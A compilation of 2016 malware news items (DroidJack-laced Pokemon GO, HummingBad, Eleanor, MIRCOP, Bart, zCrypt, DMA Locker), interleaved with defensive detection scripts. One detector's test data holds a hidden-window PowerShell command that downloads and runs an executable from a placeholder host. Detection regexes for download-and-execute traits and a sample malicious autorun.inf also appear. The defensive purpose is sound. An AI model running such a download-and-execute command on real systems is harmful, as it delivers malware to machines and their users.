Pokemon GO


The new mobile game “Pokemon Go” has become the hottest iPhone and Android game to hit the market in a long time, with enormous popularity and massive social impact. The app has taken the world by storm since its launch this week, but it has also played a role in armed robberies in Missouri, the discovery of a body in Wyoming and minor injuries to fans distracted by the app, and, to top it all, malware-infected APKs.

Nintendo’s new location-based augmented reality game allows players to catch Pokémon in real life using their device’s camera, and it is currently officially available only in the United States, New Zealand, the UK and Australia. Five days after its release, the game is on more Android phones than the dating app Tinder or Snapchat, and its rate of daily active users was neck and neck with the social network Twitter, according to analytics firm SimilarWeb.

Due to the huge interest surrounding Pokémon Go, many gaming and tutorial websites have published tutorials recommending that users download the APK from a link outside Google Play. To install such an APK, users are required to “side-load” the app by changing a core Android security setting so that the device’s OS will install apps from “untrusted sources.”

An infected Android version of the newly released mobile game Pokemon GO has been discovered [1]. This specific APK was modified to include the malicious remote access tool (RAT) called DroidJack (also known as SandroRAT), which would virtually give an attacker full control over a victim’s phone.

A simple method to check whether a device is infected is to inspect the installed application’s permissions: go to Settings → Apps → Pokemon GO and scroll down to the PERMISSIONS section.

If you find that the game has asked for permissions such as directly calling phone numbers, reading and editing your SMS messages, recording audio, reading web history, reading and modifying your contacts, reading and writing call logs, and changing network connectivity, uninstall the game right away, since it is infected with DroidJack.
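The same permission check can be automated over the output of `adb shell dumpsys package <package>` for a device you administer. The script below is an added example, not code from the original article or from the DroidJack analysis it cites; the mapping of the article's plain-English permission list onto Android permission constants is my own, the package name and the `dumpsys` excerpt are constructed, and only the `requested permissions:` block is parsed.

```python
"""Flag DroidJack-style permissions in `adb shell dumpsys package <pkg>` output.

Added example. The permission constants below are one mapping of the article's
plain-English list onto Android permission names (an assumption); the dumpsys
excerpt is constructed to resemble a trojanised build, not real output.
"""

# Permissions the article names as a sign of the DroidJack-laced APK.
RAT_PERMISSIONS = {
    "android.permission.CALL_PHONE": "directly call phone numbers",
    "android.permission.READ_SMS": "read your SMS messages",
    "android.permission.WRITE_SMS": "edit your SMS messages",
    "android.permission.SEND_SMS": "send SMS messages",
    "android.permission.RECEIVE_SMS": "receive SMS messages",
    "android.permission.RECORD_AUDIO": "record audio",
    "com.android.browser.permission.READ_HISTORY_BOOKMARKS": "read web history",
    "android.permission.READ_CONTACTS": "read your contacts",
    "android.permission.WRITE_CONTACTS": "modify your contacts",
    "android.permission.READ_CALL_LOG": "read call logs",
    "android.permission.WRITE_CALL_LOG": "write call logs",
    "android.permission.CHANGE_NETWORK_STATE": "change network connectivity",
}


def requested_permissions(dumpsys_text):
    """Return the permission names listed under 'requested permissions:'.

    The block ends at the first non-blank line indented no deeper than the header.
    """
    perms = []
    header_indent = None
    for line in dumpsys_text.splitlines():
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        if header_indent is None:
            if line.strip() == "requested permissions:":
                header_indent = indent
            continue
        if indent <= header_indent:
            break  # left the block
        # entries look like 'android.permission.X' or 'android.permission.X: granted=true'
        perms.append(line.strip().split(":", 1)[0])
    return perms


def rat_indicators(dumpsys_text):
    """Return [(permission, plain-English meaning)] for every RAT-style permission requested."""
    return [(p, RAT_PERMISSIONS[p])
            for p in requested_permissions(dumpsys_text) if p in RAT_PERMISSIONS]


# Constructed dumpsys excerpt (package name and permission list are made up for the demo).
SAMPLE_DUMPSYS = """\
Packages:
  Package [com.example.pokemongo.sideloaded] (1a2b3c):
    requested permissions:
      android.permission.INTERNET
      android.permission.ACCESS_FINE_LOCATION
      android.permission.CAMERA
      android.permission.READ_SMS
      android.permission.RECORD_AUDIO
      android.permission.READ_CALL_LOG
      android.permission.CALL_PHONE
    install permissions:
      android.permission.INTERNET: granted=true
"""

if __name__ == "__main__":
    hits = rat_indicators(SAMPLE_DUMPSYS)
    if hits:
        print("Suspicious: the game asked to", "; ".join(m for _, m in hits))
    else:
        print("No RAT-style permissions requested")
```

A legitimate build of a location-based camera game needs network, location and camera access; none of the telephony, SMS, contacts or audio permissions above have any place in it, so a single hit is enough to justify uninstalling.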

Bottom line: just because you can get the latest software on your device does not mean that you should. Downloading applications from legitimate app stores is the best way to avoid compromising your device and the networks it accesses.

HummingBad Android malware: is your device infected?


The same group of cybercriminals behind a strain of iOS malware uncovered last year have apparently diversified and now dabble in Android malware. The group, dubbed Yingmob, has been running a malware campaign named HummingBad that controls 10 million Android devices globally and rakes in $300,000 a month.

Researchers revealed that a Chinese advertising company had created one of the most pernicious pieces of Android malware yet; they estimate it has infected 10m Android handsets worldwide. Be on your guard: HummingBad can do virtually anything the attacker wants, from spying on your personal information to stealing your bank login details.

The main purpose of the HummingBad malware is to trick users into clicking on mobile and web ads, which generates advertising revenue for its parent company, Yingmob – a practice known as “clickfraud”. It’s a lot like the browser toolbars designed to deliver ads to your computer a decade ago.

The malware roots hundreds of devices daily; sometimes the rooting attempt fails, but not always. As far as the ad fraud campaign goes, it really does it all: HummingBad displays more than 20 million ads per day, generates more than 2.5 million clicks per day, and installs more than 50,000 bogus apps per day.

Once the malware gains “root access” to Android – the very heart of your phone’s operating system – and calls home to a server controlled by Yingmob, it could be used to do virtually anything the attacker wants it to do, from spying on your personal information to stealing your bank login details. Even if the creators of the malware currently use it only for click fraud, they could decide to sell the rootkit on the internet’s black market.

Most people probably got infected because they installed a less-than-hygienic app from a third-party Android store or website. The vast majority of the 10m infected handsets reside in China and India, indicating third-party app stores – which are far more popular overseas – as the most likely sources. But around 250,000 are based in the US, so these could be people who are traveling from Asia to the US, or simply people who ignore Android’s default settings and allow app installs from third-party sites.

You need to install a good mobile security product for Android, such as Max Total Security - Android, to detect this malware and protect your device from other malware.

Cyber Criminals Using Rio Olympics to Target Users with Phishing Scams


The Olympics are right around the corner, and the world will turn its attention to Rio de Janeiro for the Games of the XXXI Olympiad, better known as the Summer Olympics in Rio. Unfortunately, the cybercriminals know this and are getting ready for the Olympics as well. Scammers are registering domains that contain the terms “Rio” and “rio2016.” They are also buying low-cost SSL certificates so that their fake websites appear authentic and trusted to users. Phishing websites imitating ticket sale services have turned out to be the most effective of all the scams directed at innocent users so far.

It’s not only end users who are targets of phishing attacks. Brazil tops the list as the most attacked country with this type of scam, and employees of the Games organization were also targeted for their potentially lucrative credentials. As happened during the last World Cup, most of the malicious e-mails sent by the Brazilian bad guys used free tickets to watch the Games in Rio as the bait. Some of these messages also pointed to fake websites. This is a good example of a very well done campaign, promising direct ticket sales without having to enter the official lotteries that are held for people living in Brazil.

We warn readers to be careful and not fall for such scams, and we expect an increase in such scam emails as the Rio Olympics gear up in August 2016.

New Malware Uses Tor to Open Backdoor on Mac OS X Systems

The malware’s technical name is Backdoor.MAC.Eleanor, and currently, its creators are distributing it to victims as EasyDoc Converter, a Mac app that allows users to convert files by dragging them over a small window.

Backdoor.MAC.Eleanor creates a .onion address for your Mac. The Tor service automatically connects the infected computer to the Tor network and generates a .onion domain through which the attacker can access the user’s system using only a browser.

The PHP web service is the receiving end of that connection and is also tasked with relaying the commands it receives from the crook’s control panel to the local Mac operating system.
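The arrangement described above is a Tor hidden service that forwards an .onion port to a web service listening on the local machine. When responding to a Mac with an unexpected Tor instance, the first question is what that instance exposes, and the answer lives in its torrc. The script below is an added example, not code from the original article or from the Eleanor analysis; it parses the real Tor directives `HiddenServiceDir` and `HiddenServicePort`, while the sample torrc, its directory path and ports are constructed.

```python
"""List what a Tor hidden-service configuration exposes from the local machine.

Added example. HiddenServiceDir / HiddenServicePort are real Tor options and
Tor really writes the generated .onion name to <HiddenServiceDir>/hostname;
the sample torrc below (paths, ports) is constructed.
"""
import os
import shlex


def parse_hidden_services(torrc_text):
    """Return [{'dir', 'virtport', 'target'}] for every HiddenServicePort in torrc_text.

    A HiddenServicePort line belongs to the most recent HiddenServiceDir.
    Tor's syntax is 'HiddenServicePort VIRTPORT [TARGET]'; TARGET defaults to
    127.0.0.1:VIRTPORT, and a bare port means 127.0.0.1:PORT.
    """
    services = []
    current_dir = None
    for raw in torrc_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        key, _, rest = line.partition(" ")
        key = key.lower()
        if key == "hiddenservicedir":
            current_dir = rest.strip()
        elif key == "hiddenserviceport":
            parts = shlex.split(rest)
            virtport = int(parts[0])
            target = parts[1] if len(parts) > 1 else str(virtport)
            if target.isdigit():
                target = "127.0.0.1:" + target
            services.append({"dir": current_dir, "virtport": virtport, "target": target})
    return services


def onion_address(hs_dir):
    """Read the .onion name Tor stores in <HiddenServiceDir>/hostname, or None if absent."""
    try:
        with open(os.path.join(hs_dir, "hostname")) as fh:
            return fh.read().strip() or None
    except OSError:
        return None


def describe(torrc_text):
    """One human-readable line per exposed port, naming the .onion where the hostname file exists."""
    lines = []
    for svc in parse_hidden_services(torrc_text):
        addr = onion_address(svc["dir"]) or "<hostname file not found>"
        lines.append(f"{addr} port {svc['virtport']} -> {svc['target']} (config dir {svc['dir']})")
    return lines


# Constructed torrc resembling a hidden service that fronts a local web service.
SAMPLE_TORRC = """\
SocksPort 0
HiddenServiceDir /tmp/constructed-hs-dir   # constructed path
HiddenServicePort 80 127.0.0.1:9000        # .onion port 80 -> local web service
HiddenServicePort 8080 8080                # bare target port: same host, 127.0.0.1
"""

if __name__ == "__main__":
    for entry in describe(SAMPLE_TORRC):
        print(entry)
```

Run against the torrc of any Tor process found on the machine, this turns a vague "Tor is running" into a list of which local ports are reachable from the Tor network, which is exactly the property a backdoor like this one relies on.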

The backdoor provides a lot of remote management options. Additionally, the attackers can list locally running apps, use the infected computer to send emails, use it as an intermediary point to connect to and administer databases, and scan remote firewalls for open ports.

The infected computer basically becomes a bot in the crook’s botnet; the crook can at any time use it to send out massive spam campaigns, steal sensitive data from the infected system, use it as a DDoS bot, or install other malware.

Below is an image of what the crook sees when accessing your Mac’s Tor .onion link.

[Image: the attacker’s control panel as seen when accessing the Mac’s Tor .onion link]

The application name is EasyDoc Converter.app, and its main functionality should be to convert documents, but it does anything but that. Instead, it silently installs a backdoor in the system that gives the attacker full access to the operating system, including a file explorer, shell execution, webcam image and video capture and more. The application is created using Platypus, a tool for building native Mac apps from shell, Perl, Python or Ruby scripts (http://sveinbjorn.org/platypus).


MIRCOP Crypto-Ransomware

The MIRCOP ransomware is distributed as a malicious document in spam emails, supposedly a Thai customs form used when importing or exporting goods. The document asks users to enable macros in order to sign it, but instead abuses Windows PowerShell to download and execute the malicious payload.
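The infection chain above, an Office document whose macro launches PowerShell to fetch and run a payload, leaves a distinctive parent/child relationship in process-creation telemetry. The detector below is an added example, not code from the original article or from the MIRCOP analysis: it scores records of the shape an EDR or Sysmon process-creation feed provides (parent image, child image, command line). The field layout, thresholds, trait list and all sample events are my assumptions, and the URL in the malicious sample is a placeholder.

```python
"""Flag Office documents spawning PowerShell download-and-run chains.

Added example. Runs over constructed process-creation records; the record
layout, the trait regexes and the score threshold are assumptions chosen
for the demo, not a published signature.
"""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line traits that together make a PowerShell launch look like a macro-driven
# download cradle rather than an administrator's interactive or scheduled use.
CRADLE_TRAITS = [
    ("download", re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|bitsadmin", re.I)),
    ("execute", re.compile(r"invoke-expression|\biex\b|start-process|\bsaps\b", re.I)),
    ("encoded", re.compile(r"\s-e(nc|ncodedcommand)?\s", re.I)),
    ("hidden", re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b|bypass", re.I)),
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, traits) for one record, or None if the parent/child pair is irrelevant.

    An Office parent spawning a script host scores 1 on its own; each cradle
    trait found in the command line adds 1.
    """
    if basename(event["parent"]) not in OFFICE_PARENTS or basename(event["image"]) not in SCRIPT_HOSTS:
        return None
    traits = [name for name, rx in CRADLE_TRAITS if rx.search(event["cmdline"])]
    return 1 + len(traits), traits


def detect(events, threshold=3):
    """Return alerts [(record index, score, traits)] for records scoring at or above threshold."""
    alerts = []
    for i, ev in enumerate(events):
        result = score_event(ev)
        if result and result[0] >= threshold:
            alerts.append((i, result[0], result[1]))
    return alerts


# Constructed records: two unrelated launches, one low-scoring Office->PowerShell
# launch, and one that matches the macro-to-PowerShell pattern the article describes.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Program Files\Adobe\Acrobat\Acrobat.exe",
     "cmdline": "Acrobat.exe invoice.pdf"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass .\\deploy.ps1"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\refresh.ps1"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                "'http://example.invalid/p.exe','p.exe'); Start-Process 'p.exe'\""},
]

if __name__ == "__main__":
    for idx, score, traits in detect(SAMPLE_EVENTS):
        print(f"record {idx}: score {score}, traits {traits}")
```

The third record shows why the parent/child pair alone is not enough: Excel legitimately launching a plain script scores 1 and stays below the threshold, while the Word launch with a hidden window and a download-then-execute command line scores 4. Tuning the threshold and trait list against your own baseline is the real work; the structure is what the example shows.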

The following screen is shown to the victim, suggesting that the victim has stolen 48.48 BTC from a hacktivist group.

[Image: MIRCOP ransom note]

In addition to encrypting files on the infected machine, MIRCOP can steal credentials from various applications, including Mozilla Firefox, Google Chrome, Opera, FileZilla, and Skype, researchers discovered. Users should be careful when receiving mail from unknown sources and should refrain from downloading and opening any attachments.

MIRCOP demands that users pay a ransom of 48.48 bitcoins (US$ 28,730.70 as of June 23, 2016), which is among the highest demands we have seen. At the end of the note, the author leaves a bitcoin address. Unlike other ransomware notes, where victims are instructed step by step on how to make the payment, MIRCOP assumes that the victim is familiar with making bitcoin transactions.

RockLoader Delivers New Bart Encryption Ransomware

A new ransomware by the name of Bart is spreading. Victims’ files are encrypted by using third-party software to compress each file into a password-protected ZIP file, appending the extension “.bart.zip”. This ransomware appears to spread by the same vectors as Locky and to mimic it.

The following ransom note is displayed and is saved to the desktop as “recovery.txt”.

[Image: Bart ransom note, recovery.txt]

The messages in this campaign had the subject “Photos” with the attachment “photos.zip”, “image.zip”, “Photos.zip”, “photo.zip”, “Photo.zip”, or “picture.zip.” The zip files contained a JavaScript file such as “PDF_123456789.js”.
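Both ends of this campaign involve ZIP files: the inbound lure is a “photos” archive carrying a JavaScript file posing as a PDF, and the damage is a per-file password-protected archive with the “.bart.zip” extension. The triage function below is an added example, not code from the original article or from the Bart analysis; it inspects an archive's member names and the ZIP “encrypted” flag without extracting anything. The archives are constructed in memory (the .js member is an inert comment, and the encrypted flag is patched in because Python's `zipfile` cannot write encrypted archives); the lure name mirrors the article's “PDF_123456789.js”.

```python
"""Triage ZIP attachments and Bart-style '.bart.zip' containers without extracting them.

Added example. Archives are constructed in memory; the extension lists and
verdict labels are assumptions chosen for the demo.
"""
import io
import zipfile

SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".ps1", ".exe", ".scr", ".cmd", ".bat"}
DOCUMENT_LURES = ("pdf", "doc", "invoice", "photo", "image", "picture", "scan")


def triage_zip(filename, data):
    """Return findings for one archive given its outer file name and raw bytes.

    - script_members: entries that are script or executable types
    - document_lures: script members whose names pose as documents or photos
    - encrypted_members: entries with general-purpose bit 0 set (password-protected),
      which is how Bart stores each victim file
    - ransomed_name: outer name ends in '.bart.zip'
    """
    findings = {
        "script_members": [],
        "document_lures": [],
        "encrypted_members": [],
        "ransomed_name": filename.lower().endswith(".bart.zip"),
    }
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
            if ext in SCRIPT_EXTENSIONS:
                findings["script_members"].append(name)
                if any(lure in name.lower() for lure in DOCUMENT_LURES):
                    findings["document_lures"].append(name)
            if info.flag_bits & 0x1:  # general-purpose bit 0: entry is encrypted
                findings["encrypted_members"].append(name)
    return findings


def verdict(findings):
    """Map findings to an action: a ransomed artifact, a blockable lure, an opaque archive, or allow."""
    if findings["ransomed_name"]:
        return "bart-artifact"   # an already-encrypted victim file, not an inbound mail
    if findings["script_members"]:
        return "block"           # executable content posing as photos or documents
    if findings["encrypted_members"]:
        return "inspect"         # contents cannot be scanned without the password
    return "allow"


def make_zip(members):
    """Build an uncompressed ZIP in memory from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


def mark_encrypted(zip_bytes):
    """Set the 'encrypted' flag on a single-entry archive to mimic a password-protected ZIP.

    zipfile cannot write encrypted archives, so the flag is patched in both the
    local file header (offset 6) and the central directory entry (offset 8).
    """
    buf = bytearray(zip_bytes)
    buf[buf.find(b"PK\x03\x04") + 6] |= 0x1
    buf[buf.find(b"PK\x01\x02") + 8] |= 0x1
    return bytes(buf)


# Constructed inbound lure: 'photos.zip' carrying a JavaScript file named like a PDF.
LURE_ZIP = make_zip({"PDF_123456789.js": b"// inert stand-in for the downloader script\n"})
# Constructed Bart-style output: a victim file re-packed into a password-protected ZIP.
RANSOMED_ZIP = mark_encrypted(make_zip({"holiday.jpg": b"not really a jpeg"}))

if __name__ == "__main__":
    for name, data in (("photos.zip", LURE_ZIP), ("holiday.jpg.bart.zip", RANSOMED_ZIP)):
        print(name, "->", verdict(triage_zip(name, data)))
```

At the mail gateway the “block” verdict is the useful one: an archive whose members are script types is worth stopping regardless of what the subject line promises. On an endpoint, a sudden population of “.bart.zip” files with the encrypted flag set is the signal that the damage phase has already started.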


Encrypted files look similar to the ones below:

[Image: files encrypted by Bart, each renamed with the .bart.zip extension]

The ransom note urges the user to visit a payment portal in order to pay 3 bitcoins (just under $2000 at current exchange rates). The payment portal is similar to the one used by Locky ransomware. By harnessing the skill and judgment of empowered users, an organization can bolster its defenses against malware threats delivered via phishing email.

Overlay Malware spreading via SMS phishing in Europe on Android devices

Overlay malware is a criminal’s Swiss Army knife. It is flexible and effective at stealing financial credentials as well as many other types of sensitive data on an Android device. Overlay malware botnets are expected to proliferate due to the malware’s proven ability to steal financial credentials alongside other authentication and customer data from mobile devices.

Threat actors typically first set up the command and control (C2) servers and malware hosting sites, then put the malware apps on the hosting sites and send victims SMS messages with an embedded link that leads to the malware app. After landing on the user’s device, the malware launches a process to monitor which app is running in the foreground on the compromised device. When the user launches a benign app into the foreground that the malware is programmed to target (such as a banking app), the malware overlays a phishing view on top of the benign app. The unwary user, assuming that they are using the benign app, enters the requested account credentials, which are then sent to remote C2 servers controlled by the threat actors.

Smishing (SMS phishing) offers a unique vector to infect mobile users. The latest Smishing campaigns spreading in Europe show that Smishing is still a popular means for threat actors to distribute their malware. In addition, threat actors have been using diversified host schemes and different C2 servers, and have been continuously refining their malicious code to keep infecting more users and evade detection.

To protect against these threats, users should not install apps from outside official app stores, and take caution before clicking any links where the origin is unclear.

Beware Of Nasty zCrypt

First detected by a security researcher named Jack on May 24, the ransomware infects users’ computers via malicious spam, malicious macros in Microsoft Office documents, and fake software installers. “We are alerting Windows users of a new type of ransomware that exhibits worm-like behavior. This ransomware leverages removable and network drives to propagate itself and affect more users. We detect this ransomware as Ransom:Win32/ZCryptor.A,” Microsoft stated in its Threat Research & Response blog. Microsoft notes in its alert that the ransomware currently targets 88 different file types for encryption.

[Image: ZCryptor ransom note]

When executed, the malware creates a pop-up that appears to be benign, likely to confuse the user while the malware talks to the command and control server and begins the encryption routine. The pop-up keeps appearing while the malware is running. At this time, there is no known way for users affected by ZCryptor to recover their encrypted files for free, unless they have a secure backup of their data on hand. Upon successful installation, the ransomware proceeds to encrypt the unsuspecting user’s files.

Victims must pay the ransom fee, remove the malware and its files from their computers, and then scan their machines for additional malicious code. This ransomware has a secret: before it even begins the encryption process, the crypto-malware drops “autorun.inf” on all attached removable drives, effectively creating a copy of itself on every USB drive connected to the computer at the time of infection.

This propagation technique sets ZCryptor apart from other ransomware variants like Alpha, which is capable of encrypting files on shared folders only. This newest ransomware may even invoke the notion of a “cryptoworm”, first articulated by Cisco security researcher William Largent back in April. ZCryptor might be a harbinger of threats to come.
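The autorun.inf that ZCryptor drops is an ordinary Windows AutoRun file, so a responder can read it from any suspect USB stick with a plain INI parser and see what it would launch. The script below is an added example, not code from the original article or from Microsoft's analysis; the `[autorun]` keys it reads (`open`, `shellexecute`, `action`, `icon`) are the real AutoRun keys, while the sample file and the payload file name `sample_payload.exe` are constructed placeholders, since the article does not name the dropped file.

```python
"""Inspect an autorun.inf of the kind ZCryptor drops on removable drives.

Added example. The sample autorun.inf and the payload name are constructed;
the parsed keys are the real Windows AutoRun keys.
"""
import configparser
import os
import tempfile

# Keys that name the program AutoRun would start, in the order Windows prefers them.
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command")


def parse_autorun(text):
    """Return the [autorun] section as a lower-cased key/value dict.

    Tolerates a missing section header and a differently cased one, and turns
    off '%' interpolation because icon= values such as %SystemRoot% are literal.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    if not text.lstrip().startswith("["):
        text = "[autorun]\n" + text
    cp.read_string(text)
    section = next((s for s in cp.sections() if s.lower() == "autorun"), None)
    return dict(cp[section]) if section else {}


def assess_autorun(text, drive_root=None):
    """Describe what an autorun.inf would launch and whether the target exists on the drive.

    Returns {'launches', 'target_present', 'poses_as_folder'}; target_present
    is None when no drive_root is given to check against.
    """
    entries = parse_autorun(text)
    launches = next((entries[k] for k in LAUNCH_KEYS if k in entries), None)
    target_present = None
    if launches and drive_root is not None:
        program = launches.strip().strip('"').split(" ")[0]
        target_present = os.path.exists(os.path.join(drive_root, program))
    action = entries.get("action", "").lower()
    return {
        "launches": launches,
        "target_present": target_present,
        # Malware often reuses Explorer's own wording so the AutoPlay prompt looks routine.
        "poses_as_folder": "open folder" in action or "view files" in action,
    }


def scan_drive(drive_root):
    """Assess the autorun.inf at the root of a drive, or return None if there is none."""
    for name in os.listdir(drive_root):
        if name.lower() == "autorun.inf":
            with open(os.path.join(drive_root, name), encoding="utf-8", errors="replace") as fh:
                return assess_autorun(fh.read(), drive_root)
    return None


# Constructed autorun.inf; the payload name is a placeholder, not the real dropped file.
SAMPLE_AUTORUN = """\
[autorun]
open=sample_payload.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,4
action=Open folder to view files
"""


def demo_drive():
    """Build a throwaway 'USB stick' holding the sample autorun.inf and a payload stub, then scan it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "autorun.inf"), "w") as fh:
            fh.write(SAMPLE_AUTORUN)
        with open(os.path.join(root, "sample_payload.exe"), "wb") as fh:
            fh.write(b"stand-in bytes, not an executable")
        return scan_drive(root)


if __name__ == "__main__":
    print(demo_drive())
```

The `poses_as_folder` check is the tell that separates this from a vendor's installer disc: a file whose `open=` points at an executable on the stick while its `action=` text imitates Explorer's own “Open folder to view files” prompt is trying to get the user to run it by reflex.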

Fortunately, we can largely defend against it as we would other ransomware variants, such as by avoiding clicking on suspicious links and email attachments, disabling macros by default, downloading software from trusted sources only, maintaining secure backups, and running an up-to-date anti-virus product capable of scanning removable drives on our computers.

BadBlock ransomware

BadBlock is a ransomware-type virus that, after system infiltration, encrypts various files stored on victims’ computers. Unlike other ransomware, BadBlock does not add any extension to encrypted files. After encryption, BadBlock opens a window with a message providing details about the encryption. This ransomware also creates a Help_Decrypt.html file (which contains an identical message), placing it in each folder containing encrypted files.

Unlike other ransomware like Locky, TeslaCrypt, KimcilWare, PETYA, Mischa and CryptXXX, BadBlock does not append a custom extension to the encrypted file.

It changes the computer’s wallpaper to a red lock screen and grabs the victim’s attention with the caption, “Badblock in on the block!” It claims that the user’s files have been encrypted using the RSA algorithm, an asymmetric cryptographic algorithm that uses two different keys (public and private) and is commonly used to transmit data securely.

After rendering the files inaccessible, BadBlock demands a ransom of two bitcoins (or $900, according to the ransom note). The user is also provided with help links on how to buy bitcoins and how to transfer them to the attacker’s account.

The ransom note further explains that the decryption process will only start upon verification of payment, which it says can take up to two hours. It also warns, “If your anti-virus gets updated and remove BadBlock automatically, even if you pay the ransom, it will not be able to recover your files!”

DMA Locker 4.0 – Ransomware Prepares for Distribution

In contrast to the previous versions, DMA Locker 4.0 cannot encrypt files offline. It needs to download the public RSA key from its C&C. That is why, if the file is opened on a computer without an internet connection, it just installs itself and waits. If the machine is connected, it runs silently until it finishes encrypting all the files. It then displays the message below and asks for a bitcoin payment:

[Image: DMA Locker 4.0 ransom screen]

This time DMA Locker comes with a deception layer added: the packed sample has an icon pretending to be a PDF document. After being run, it moves itself to the same location as its previous editions, C:\ProgramData, under the name svchosd.exe. In addition to the main sample, we can see two additional files: select.bat and cryptinfo.txt.

cryptinfo.txt is a ransom note analogous to those we know from the previous editions; only the content has changed. Now it is much shorter and contains a link to an individual website for the victim. The malware also adds registry keys for persistence in HKEY_USERS. This time the main sample, svchosd.exe, is registered under the name Windows Firewall and the script select.bat under Windows Update. The public key is not hardcoded this time but generated per victim* and downloaded.
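The persistence described above combines two tells a hunter can score mechanically: an autostart value whose name borrows a Windows component (“Windows Firewall”, “Windows Update”) but whose target lives in a user-writable directory (C:\ProgramData), and a binary name one character away from a genuine system binary (svchosd.exe against svchost.exe). The script below is an added example, not code from the original article or from the DMA Locker analysis; it parses the text layout printed by `reg query` for a Run key. The SID, user name and benign entries are constructed, while the value names and the svchosd.exe / select.bat targets are the ones the article reports.

```python
"""Flag autostart entries that borrow Windows component names but run from user-writable paths.

Added example. Input is `reg query ...\\Run` text; the SID and the benign
entries are constructed, the heuristics and lists are assumptions for the demo.
"""
import re

# Directories any user can write to; a 'Windows ...' component has no business starting from here.
WRITABLE_ROOTS = ("c:\\programdata", "c:\\users\\", "c:\\windows\\temp", "c:\\temp")
# Genuine system binaries whose names malware imitates with a one-character change.
SYSTEM_BINARIES = ("svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "explorer.exe", "services.exe")
SCRIPT_TYPES = (".bat", ".cmd", ".vbs", ".js", ".ps1")

# reg query prints each value as: <4 spaces>Name<4 spaces>REG_TYPE<4 spaces>Data
VALUE_LINE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")


def edit_distance(a, b):
    """Levenshtein distance, used to catch near-miss names such as svchosd.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def executable_path(data):
    """Pull the program path out of a Run value: the quoted path if quoted, else the first token."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    return data.split(" ", 1)[0]


def parse_run_key(reg_text):
    """Return [(value name, data)] for every value line in `reg query` output."""
    return [(m.group("name"), m.group("data"))
            for m in (VALUE_LINE.match(line) for line in reg_text.splitlines()) if m]


def suspicious_entries(reg_text):
    """Return [(value name, program path, [reasons])] for entries that trip any heuristic."""
    findings = []
    for name, data in parse_run_key(reg_text):
        path = executable_path(data)
        lower = path.lower()
        base = lower.rsplit("\\", 1)[-1]
        writable = lower.startswith(WRITABLE_ROOTS)
        reasons = []
        if writable and re.match(r"(windows|microsoft)\b", name.lower()):
            reasons.append("Windows component name but runs from a user-writable path")
        if writable and base.endswith(SCRIPT_TYPES):
            reasons.append("autostart script in a user-writable path")
        for sysbin in SYSTEM_BINARIES:
            if base != sysbin and edit_distance(base, sysbin) == 1:
                reasons.append(f"name is one edit away from {sysbin}")
        if reasons:
            findings.append((name, path, reasons))
    return findings


# Constructed reg query output: two ordinary entries plus the two the article describes.
SAMPLE_REG_QUERY = r"""
HKEY_USERS\S-1-5-21-EXAMPLE-SID\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Windows Firewall    REG_SZ    C:\ProgramData\svchosd.exe
    Windows Update    REG_SZ    C:\ProgramData\select.bat
"""

if __name__ == "__main__":
    for name, path, reasons in suspicious_entries(SAMPLE_REG_QUERY):
        print(f"{name!r} -> {path}: {'; '.join(reasons)}")
```

The OneDrive entry shows the necessary negative case: it also starts from a user-writable profile path, but its name claims nothing about Windows and its binary is not a near-miss of a system process, so it is left alone. Name-plus-location is the combination worth alerting on, not either half by itself.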